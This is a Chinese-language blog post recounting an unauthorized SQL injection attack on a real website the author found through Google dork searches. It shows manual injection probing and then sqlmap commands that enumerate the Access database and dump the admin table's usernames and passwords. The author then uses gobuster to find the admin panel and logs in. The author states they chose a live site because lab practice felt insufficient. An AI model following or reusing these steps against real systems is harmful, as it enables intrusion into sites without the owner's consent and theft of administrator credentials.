Sql注入漏洞实战记录

以往在练习sql注入漏洞的时候都是通过搭建靶站的方式进行的,靶站的东西再怎么反复练习也就那么回事了,要是真想有个效果还得来点实际的!
闲来无事上google再翻一翻,以前也翻过很多次,无奈技术菜没有找到什么适合我这种菜鸟水平的站来测试一波,真正的大佬都是个站就日的,不像我这种菜鸡,测试个网站还得东翻翻西找找…

按照以往的方式还是用goole hacker的方式进行;因为以前找的站结构都是asp.net+win+iis架构的,对这个算是比较熟悉,所以这次用的语法还是这一套,输入hacker语法一顿向后翻页,前几页的不用想了,估计都被玩遍了
找了个网站进入后查看产品获取到链接地址
http://www.xxxxx.cn/show.asp?id=14
加个‘符号看看回显信息,发现返回了错误,再试试and 1 = 1 1 = 2看下回显,确认是带有sql注入漏洞了

因为水平菜,暂时还不能通过sql语句拼接的方式达到最终目的,所以只能用sqlmap工具一波流了…

获取数据库信息

sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --dbs
file
数据库为Microsoft Access
file

获取数据库表

sqlmap -u http://www.xxxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –tables
file

获取表属性

sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –T admin --columns
file

获取表数据

sqlmap -u http://www.xxxx.cn/show.asp?id=14%20and%201%20=%201 --batch -D Microsoft Access –T admin –C username,password –dump
file

获取系统后台登录地址

后台通过gobuster工具获取后登录
file


看下了以往的日志,发现该网站从N年前就一直被别人攻,但是好像网站管理人员并不对此上心(也有可能此网站已经被弃用了),导致现在还有不断的访问日志产生
file
file